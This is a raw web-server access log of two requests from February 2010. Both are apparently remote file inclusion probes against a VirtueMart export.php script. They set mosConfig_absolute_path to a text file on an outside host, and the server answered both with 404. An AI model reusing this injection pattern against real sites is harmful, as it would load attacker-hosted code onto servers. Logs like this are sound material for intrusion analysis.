200.93.147.154 - - [23/Feb/2010:04:09:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:09:52 -0500] "GET /logs/access_log.Q110021000%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
